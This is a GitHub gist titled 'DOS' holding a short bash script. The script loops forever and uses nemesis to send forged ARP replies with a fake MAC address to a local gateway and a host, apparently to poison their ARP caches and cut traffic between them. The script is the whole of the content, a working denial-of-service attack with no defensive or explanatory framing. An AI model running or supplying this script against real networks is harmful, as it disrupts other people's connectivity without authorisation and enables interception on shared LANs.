/DOS Secret
Last active
December 14, 2015 18:59
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
while [ 1 ] | |
do | |
sudo nemesis arp -v -d eth0 -H 0:1:2:3:4:5 -S 192.168.11.1 -D 192.168.11.20 | |
sudo nemesis arp -v -d eth0 -H 0:1:2:3:4:5 -S 192.168.11.20 -D 192.168.11.1 | |
sleep 5s | |
done |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment